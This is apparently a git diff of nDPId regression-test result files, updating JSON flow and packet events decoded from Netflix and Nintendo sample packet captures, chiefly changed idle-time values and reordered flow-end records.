-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","packets-captured":6999,"packets-processed":6999,"total-skipped-flows":0,"total-l4-data-len":5686857,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":60,"total-detection-updates":52,"total-updates":0,"current-active-flows":0,"total-active-flows":61,"total-idle-flows":61,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":408,"global_ts_msec":1484319120726} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/nintendo.pcap.out b/test/results/nintendo.pcap.out index 4ea0b3a55..7d501ee87 100644 --- a/test/results/nintendo.pcap.out +++ b/test/results/nintendo.pcap.out 
@@ -15,10 +15,10 @@ 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1500731320971,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320971,"pkt":"fLuKifuEAA6OGXEMCABFAAC497sAADIRdTNbCPMjwKgMcsEYy5cApCSHMquYZAJwBDw1LZb\/EXOjSMMnhE7iZD46YMnDknY2Toj8H3hexFk8t\/NxtrnGBe7\/azeV+ylrxOZLEJSeqtaVZpj8qkFUmEqDrAokbYC5tpC2hu85m1Gapy+z4MYRc6NIwyeETuJkPjpgycOS4O1pGafPZccfGHcxxjvnUp7EdqfBF4phVhM5G67auDF2qW+tEyxBQPI1F2LvuWv4"} 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1500731320979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320979,"pkt":"AA6OGXEMfLuKifuECABFAAC4EUUAAEARHbnAqAxyhgP4GcuX3nsApFX2MquYZAL7A4KXVkGB7PFoUbxdy4R+OmcG274R5p1cluqPszGtOrY8\/h+Ka07KRMGhZXANoJoSM7n8ukD4QCqQX5N8LEBCJOczUrsTufJdxx5Y+oG3liR0QxxR9Ffs8WhRvF3LhH46ZwbbvhHm7EcDtxNE8JSi4yBs1WWoHG7r\/Cy+MHjWKN4dY\/SnlSlGAKEox5xvXQo9d3RTFT0k"} 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1500731320980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320980,"pkt":"AA6OGXEMfLuKifuECABFAAC4EUYAAEARL7TAqAxybRX\/C8uXxEsApGfqMquYZAJGA3OXVoUOaa8xKMh3YxOqQfCOROhuZZ1cluqPszGtOrY8\/h+Ka05RJidBwdgpJSzxyPBzPUj\/QCqQX5N8LEBCJOczUrsTufJdxx5Y+oG3liR0QxxR9FdprzEoyHdjE6pB8I5E6G5l7EcDtxNE8JSi4yBs1WWoHG7r\/Cy+MHjWKN4dY\/SnlSlX+kXE8MPCEZprJe3ihEAS"} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7440000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1500731322454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1500731322454,"pkt":"fLuKifuEAA6OGXEMCABFAACYFZdAAOUGcTo2uwq5wKgMcgG7vMgz\/J5Zi2972IAYALkcKwAAAQEICgQM20EAGkXPFwMDAF\/eldsI13HzPlUjJzvSUWyEIzWGgbOyhWxdkIHfN3lgjdjjc7JiXYu\/ooQ\/gzWIbwSHhgUl7CbzYWzRlB2Fe4u0GxVFMrAIoxb4XR3ehSS5gi8Kq9fYRepj92tegMbl5w=="} -00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1500731322460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1500731322460,"pkt":"AA6OGXEMfLuKifuECABFAABnEVxAAEAGGqfAqAxyNrsKubzIAbuLb3vYM\/yevYAYBAhG+gAAAQEICgAaYTYEDNtBFwMDAC4AAAAAAAAAKH6viddQUv6VCP9kwNVv1cM5qFQr1yPk5rVuTEPwOaETSFnM6WhQ"} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1500731322761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731322761,"pkt":"fLuKifuEAA6OGXEMCABFAAA0FZhAAOUGcZ02uwq5wKgMcgG7vMgz\/J69i298C4AQALmNxAAAAQEICgQM25wAGmE2"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7560000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1500731322454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1500731322454,"pkt":"fLuKifuEAA6OGXEMCABFAACYFZdAAOUGcTo2uwq5wKgMcgG7vMgz\/J5Zi2972IAYALkcKwAAAQEICgQM20EAGkXPFwMDAF\/eldsI13HzPlUjJzvSUWyEIzWGgbOyhWxdkIHfN3lgjdjjc7JiXYu\/ooQ\/gzWIbwSHhgUl7CbzYWzRlB2Fe4u0GxVFMrAIoxb4XR3ehSS5gi8Kq9fYRepj92tegMbl5w=="} 
+00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1500731322460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1500731322460,"pkt":"AA6OGXEMfLuKifuECABFAABnEVxAAEAGGqfAqAxyNrsKubzIAbuLb3vYM\/yevYAYBAhG+gAAAQEICgAaYTYEDNtBFwMDAC4AAAAAAAAAKH6viddQUv6VCP9kwNVv1cM5qFQr1yPk5rVuTEPwOaETSFnM6WhQ"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1500731322761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731322761,"pkt":"fLuKifuEAA6OGXEMCABFAAA0FZhAAOUGcZ02uwq5wKgMcgG7vMgz\/J69i298C4AQALmNxAAAAQEICgQM25wAGmE2"} 